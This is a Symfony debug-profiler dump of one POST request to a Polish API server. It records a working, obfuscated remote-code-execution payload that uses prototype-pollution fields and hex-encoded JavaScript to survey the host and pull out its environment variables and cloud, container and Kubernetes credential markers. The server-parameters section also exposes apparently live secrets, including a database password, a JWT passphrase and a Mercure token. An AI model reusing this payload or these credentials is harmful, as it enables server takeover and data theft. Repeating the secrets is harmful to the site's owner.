EntrypointAction
Request
GET Parameters
No GET parameters
POST Parameters
| Key | Value |
|---|---|
| 0 | "{"then": "$1:__proto__:then", "status": "resolved_model", "reason": -1, "value": "{\"then\": \"$B0\"}", "_response": {"_prefix": "var reject_bridge = arguments[1]; (Promise.all([Function('return import(\"node:child_process\")')(), Function('return import(\"node:zlib\")')()]).then(([cp, zlib]) => { return new Promise((resolve, reject) => { try { var user_code = global[String.fromCharCode(66,117,102,102,101,114)].from('286173796e632066756e6374696f6e28297b636f6e7374206f733d617761697420696d706f727428276f7327293b636f6e73742066733d617761697420696d706f72742827667327293b636f6e737420706174683d617761697420696d706f727428277061746827293b636f6e737420726561643d2870293d3e7b7472797b72657475726e2066732e7265616446696c6553796e6328702c277574663827293b7d63617463682865297b72657475726e27273b7d7d3b636f6e7374206578697374733d2870293d3e7b7472797b66732e61636365737353796e632870293b72657475726e20747275653b7d63617463682865297b72657475726e2066616c73653b7d7d3b636f6e7374207772697461626c653d2870293d3e7b7472797b66732e61636365737353796e6328702c66732e636f6e7374616e74732e575f4f4b293b72657475726e20747275653b7d63617463682865297b72657475726e2066616c73653b7d7d3b636f6e737420637075733d6f732e6370757328293b636f6e7374206d656d3d6f732e746f74616c6d656d28293b636f6e737420706c6174666f726d3d6f732e706c6174666f726d28293b6c657420757365723d27756e6b6e6f776e273b7472797b757365723d6f732e75736572496e666f28292e757365726e616d653b7d63617463682865297b757365723d70726f636573732e656e762e555345527c7c70726f636573732e656e762e555345524e414d457c7c27756e6b6e6f776e273b7d0a6c657420656e765f747970653d274d4554414c273b69662870726f636573732e656e762e4b554245524e455445535f534552564943455f484f53547c7c70726f636573732e656e762e444f434b45525f484f53547c7c70726f636573732e656e762e4157535f455845435554494f4e5f454e567c7c70726f636573732e656e762e44594e4f7c7c65786973747328272f2e646f636b6572656e7627297c7c65786973747328272f72756e2f2e636f6e7461696e6572656e762729297b656e765f747970653d27434f4e5441494e4552273b7d0a696628706c6174666f726d3d3d3d276c696e757827297b636f6e7374206367726f75703d7265616428272f70726f632f73656c662f6367726f757027293b6966286367726f75702e6d61746368282f646f636b65727c6b756265706f64737c6c78637c706f646d616e2f6929297b656e765f747970653d27434f4e5441494e4552273b7d0a636f6e7374206d6f756e74733d7265616428272f70726f632f73656c662f6d6f756e74696e666f27293b6966286d6f756e74732e6d61746368282f6f7665726c61797c6f7665726c6179322f69292626656e765f747970653d3d3d274d4554414c27297b656e765f747970653d27434f4e5441494e4552202850726f6261626c6529273b7d7d0a636f6e7374206e6574733d6f732e6e6574776f726b496e746572666163657328293b636f6e7374206970733d5b5d3b4f626a6563742e6b657973286e657473292e666f7245616368286b3d3e7b6e6574735b6b5d2e666f7245616368286e3d3e7b696628216e2e696e7465726e616c26266e2e66616d696c793d3d3d274950763427296970732e70757368286e2e61646472657373293b7d293b7d293b636f6e73742077726974655f636865636b733d5b6f732e746d7064697228292c272f6465762f73686d272c272f7661722f746d70272c70726f636573732e63776428295d3b636f6e737420756e697175655f636865636b733d5b2e2e2e6e6577205365742877726974655f636865636b73295d3b636f6e7374207772697461626c655f70617468733d756e697175655f636865636b732e66696c74657228703d3e7772697461626c65287029293b6c6574206861735f617678323d2730273b696628637075735b305d2626637075735b305d2e6d6f64656c2e746f55707065724361736528292e696e636c756465732827415658322729297b6861735f617678323d2731273b7d0a656c736520696628706c6174666f726d3d3d3d276c696e757827297b636f6e737420637075496e666f3d7265616428272f70726f632f637075696e666f27293b696628637075496e666f2e696e636c756465732827617678322729296861735f617678323d2731273b7d0a636f6e7374206876745f6b6579776f7264733d2f4157535f7c4543535f7c4543325f7c505249564154455f4b45597c4d4e454d4f4e49437c57414c4c45547c4b455953544f52457c534545445f5048524153457c53454e44475249447c4d41494c47554e7c504f53544d41524b7c5345535f2f693b636f6e73742069735f6876745f656e763d4f626a6563742e6b6579732870726f636573732e656e76292e736f6d65286b3d3e6876745f6b6579776f7264732e74657374286b29293b636f6e737420686f6d653d6f732e686f6d6564697228293b636f6e7374206177735f63726564733d706174682e6a6f696e28686f6d652c272e617773272c2763726564656e7469616c7327293b6c65742069735f6876745f6469736b3d657869737473286177735f6372656473293b696628706c6174666f726d3d3d3d276c696e757827297b69735f6876745f6469736b3d69735f6876745f6469736b7c7c7772697461626c6528272f7661722f72756e2f646f636b65722e736f636b27297c7c65786973747328272f7661722f72756e2f736563726574732f6b756265726e657465732e696f2f736572766963656163636f756e742f746f6b656e27297c7c65786973747328272f726f6f742f2e6177732f63726564656e7469616c7327293b7d0a6c65742061637475616c5f72616d5f6d623d4d6174682e666c6f6f72286d656d2f313032342f31303234292e746f537472696e6728293b6c65742061637475616c5f636f7265733d637075732e6c656e6774682e746f537472696e6728293b696628706c6174666f726d3d3d3d276c696e757827297b7472797b6c6574206d656d5374723d7265616428272f7379732f66732f6367726f75702f6d656d6f72792f6d656d6f72792e6c696d69745f696e5f627974657327292e7472696d28293b696628216d656d537472296d656d5374723d7265616428272f7379732f66732f6367726f75702f6d656d6f72792e6d617827292e7472696d28293b6966286d656d53747226266d656d537472213d3d276d617827297b636f6e73742062797465733d7061727365496e74286d656d537472293b6966282169734e614e28627974657329262662797465733e30262662797465733c6d656d297b61637475616c5f72616d5f6d623d4d6174682e666c6f6f722862797465732f313032342f31303234292e746f537472696e6728293b7d7d0a636f6e73742071756f74613d7061727365496e74287265616428272f7379732f66732f6367726f75702f6370752f6370752e6366735f71756f74615f757327292e7472696d2829293b636f6e737420706572696f643d7061727365496e74287265616428272f7379732f66732f6367726f75702f6370752f6370752e6366735f706572696f645f757327292e7472696d2829293b6966282169734e614e2871756f74612926262169734e614e28706572696f6429262671756f74613e30297b61637475616c5f636f7265733d4d6174682e666c6f6f722871756f74612f706572696f64292e746f537472696e6728293b69662861637475616c5f636f7265733d3d3d2230222961637475616c5f636f7265733d22302e58223b656c73652061637475616c5f636f7265733d4d6174682e6d617828312c7061727365496e742861637475616c5f636f72657329292e746f537472696e6728293b7d656c73657b636f6e7374206370754d61783d7265616428272f7379732f66732f6367726f75702f6370752e6d617827292e7472696d28293b6966286370754d6178297b636f6e73742070617274733d6370754d61782e73706c697428272027293b69662870617274732e6c656e6774683d3d3d32262670617274735b305d213d3d276d617827297b636f6e737420713d7061727365496e742870617274735b305d293b636f6e737420703d7061727365496e742870617274735b315d293b6966282169734e614e28712926262169734e614e287029297b6c657420633d4d6174682e666c6f6f7228712f70293b61637475616c5f636f7265733d28633c313f22302e58223a63292e746f537472696e6728293b7d7d7d7d7d63617463682865297b7d7d0a72657475726e7b22706c6174666f726d223a706c6174666f726d2c22757365725f6964223a757365722c226b65726e656c5f72656c65617365223a6f732e72656c6561736528292c22656e765f74797065223a656e765f747970652c22686f73745f636f7265735f746f74616c223a637075732e6c656e6774682e746f537472696e6728292c22757361626c655f636f726573223a61637475616c5f636f7265732c226370755f6d6f64656c223a637075735b305d3f637075735b305d2e6d6f64656c3a22756e6b6e6f776e222c226861735f61767832223a6861735f617678322c2272616d5f746f74616c5f6d62223a4d6174682e666c6f6f72286d656d2f313032342f31303234292e746f537472696e6728292c22757361626c655f72616d5f6d62223a61637475616c5f72616d5f6d622c22697073223a6970732c227772697461626c655f7061746873223a7772697461626c655f70617468732c22637764223a70726f636573732e63776428292c22656e765f76617273223a70726f636573732e656e762c22656e765f766172735f636f756e74223a4f626a6563742e6b6579732870726f636573732e656e76292e6c656e6774682e746f537472696e6728292c2269735f687674223a2869735f6876745f656e767c7c69735f6876745f6469736b292e746f537472696e6728297d3b7d2928293b', 'hex').toString(); var val = eval(user_code); Promise.resolve(val).then(function(v) { var res_str = (typeof v === 'object') ? JSON.stringify(v) : String(v); try { res_str = zlib.deflateSync(res_str); } catch(e) {} var res_hex = global[String.fromCharCode(66,117,102,102,101,114)].from(res_str).toString('hex'); reject(Object.assign(new Error('RCE_RES'), { digest: res_hex })); }).catch(function(e) { reject(Object.assign(new Error('JS_EXEC_ERR'), { digest: global[String.fromCharCode(66,117,102,102,101,114)].from('JS Async Error: ' + e.message).toString('hex') })); }); } catch(e) { reject(Object.assign(new Error('JS_ERR'), { digest: global[String.fromCharCode(66,117,102,102,101,114)].from('JS Error: ' + e.message).toString('hex') })); } });})).catch(err => reject_bridge(err)); ", "_formData": {"get": "$1:constructor:constructor"}}}" |
| 1 | ""$@0"" |
Uploaded Files
No files were uploaded
Request Attributes
| Key | Value |
|---|---|
| _api_respond | "true" |
| _controller | "api_platform.action.entrypoint" |
| _firewall_context | "security.firewall.map.context.main" |
| _format | "" |
| _links | Symfony\Component\WebLink\GenericLinkProvider {#3607 -links: [ 3591 => Symfony\Component\WebLink\Link {#3591 -href: "https://api.kurka.info.pl/docs.jsonld" -rel: [ "http://www.w3.org/ns/hydra/core#apiDocumentation" => "http://www.w3.org/ns/hydra/core#apiDocumentation" ] -attributes: [] } ] } |
| _route | "api_entrypoint" |
| _route_params | [ "_format" => "" "_api_respond" => "true" "index" => "index" ] |
| _stopwatch_token | "1ac07e" |
| index | "index" |
Request Headers
| Header | Value |
|---|---|
| accept | "text/plain, */*;q=0.1" |
| accept-encoding | "identity" |
| authorization | "" |
| connection | "close" |
| content-length | "8828" |
| content-type | "multipart/form-data; boundary=------------------------bissa_cve_boundary" |
| host | "api.kurka.info.pl" |
| next-action | "x" |
| user-agent | "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" |
| x-php-ob-level | "1" |
| x-real-ip | "46.101.195.176" |
Request Content
Request content not available (it was retrieved as a resource).
Response
Response Headers
| Header | Value |
|---|---|
| cache-control | "private, must-revalidate" |
| content-type | "application/ld+json; charset=utf-8" |
| date | "Mon, 22 Dec 2025 23:20:10 GMT" |
| expires | "-1" |
| link | "<https://api.kurka.info.pl/docs.jsonld>; rel="http://www.w3.org/ns/hydra/core#apiDocumentation"" |
| pragma | "no-cache" |
| vary | "Accept" |
| x-content-type-options | "nosniff" |
| x-debug-token | "334c49" |
| x-frame-options | "deny" |
Cookies
Request Cookies
No request cookies
Response Cookies
No response cookies
Session
Session Metadata
No session metadata
Session Attributes
No session attributes
Session Usage
0
Usages
Stateless check enabled
Session not used.
Flashes
Flashes
No flash messages were created.
Server Parameters
Server Parameters
Defined in .env
| Key | Value |
|---|---|
| APP_ENV | "dev" |
| APP_SECRET | "!ChangeMe!" |
| CORS_ALLOW_ORIGIN | "^https?:\/\/([a-z]*\.kurka\.info\.pl|kurka\.info\.pl)$" |
| DATABASE_URL | "mysql://MDadm:%2AhAQPa9tr3bta%24y8@127.0.0.1:3306/kurka01" |
| JWT_PASSPHRASE | "nf934f09jkwfngb65b56gb56t434jrfn549oj045th9g4" |
| JWT_PUBLIC_KEY | "%kernel.project_dir%/config/jwt/public.pem" |
| JWT_SECRET_KEY | "%kernel.project_dir%/config/jwt/private.pem" |
| MERCURE_JWT_TOKEN | "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJtZXJjdXJlIjp7InB1Ymxpc2giOltdfX0.Oo0yg7y4yMa1vr_bziltxuTCqb8JVHKxp-f_FwwOim0" |
| MERCURE_PUBLISH_URL | "https://mercure/.well-known/mercure" |
| TRUSTED_HOSTS | "^localhost|api|apicms|kurka" |
| TRUSTED_PROXIES | "127.0.0.0/8,10.0.0.0/8,172.16.0.0/12,192.168.0.0/16" |
Defined as regular env variables
| Key | Value |
|---|---|
| APP_DEBUG | "1" |
| CONTENT_LENGTH | "8828" |
| CONTENT_TYPE | "multipart/form-data; boundary=------------------------bissa_cve_boundary" |
| CONTEXT_DOCUMENT_ROOT | "/var/www/vhosts/kurka.info.pl/api.kurka.info.pl/public" |
| CONTEXT_PREFIX | "" |
| DOCUMENT_ROOT | "/var/www/vhosts/kurka.info.pl/api.kurka.info.pl/public" |
| FCGI_ROLE | "RESPONDER" |
| GATEWAY_INTERFACE | "CGI/1.1" |
| HOME | "/var/www/vhosts/kurka.info.pl" |
| HTTPS | "on" |
| HTTP_ACCEPT | "text/plain, */*;q=0.1" |
| HTTP_ACCEPT_ENCODING | "identity" |
| HTTP_AUTHORIZATION | "" |
| HTTP_CONNECTION | "close" |
| HTTP_HOST | "api.kurka.info.pl" |
| HTTP_NEXT_ACTION | "x" |
| HTTP_USER_AGENT | "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" |
| HTTP_X_REAL_IP | "46.101.195.176" |
| PASSENGER_COMPILE_NATIVE_SUPPORT_BINARY | "0" |
| PASSENGER_DOWNLOAD_NATIVE_SUPPORT_BINARY | "0" |
| PATH | "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" |
| PHP_SELF | "/index.php" |
| QUERY_STRING | "" |
| REMOTE_ADDR | "46.101.195.176" |
| REMOTE_PORT | "53830" |
| REQUEST_METHOD | "POST" |
| REQUEST_SCHEME | "https" |
| REQUEST_TIME | 1766445609 |
| REQUEST_TIME_FLOAT | 1766445609.9864 |
| REQUEST_URI | "/" |
| SCRIPT_FILENAME | "/var/www/vhosts/kurka.info.pl/api.kurka.info.pl/public/index.php" |
| SCRIPT_NAME | "/index.php" |
| SERVER_ADDR | "212.132.90.243" |
| SERVER_ADMIN | "[no address given]" |
| SERVER_NAME | "api.kurka.info.pl" |
| SERVER_PORT | "443" |
| SERVER_PROTOCOL | "HTTP/1.0" |
| SERVER_SIGNATURE | "<address>Apache Server at api.kurka.info.pl Port 443</address>\n" |
| SERVER_SOFTWARE | "Apache" |
| SSL_TLS_SNI | "api.kurka.info.pl" |
| SYMFONY_DOTENV_VARS | "APP_ENV,APP_SECRET,TRUSTED_PROXIES,TRUSTED_HOSTS,DATABASE_URL,CORS_ALLOW_ORIGIN,MERCURE_PUBLISH_URL,MERCURE_JWT_TOKEN,JWT_SECRET_KEY,JWT_PUBLIC_KEY,JWT_PASSPHRASE" |
| UNIQUE_ID | "aUnSKY6M4pZRFm9W_LwevQAAAMs" |
| USER | "kurka.info.pl_wpybxmu4al" |
| proxy-nokeepalive | "1" |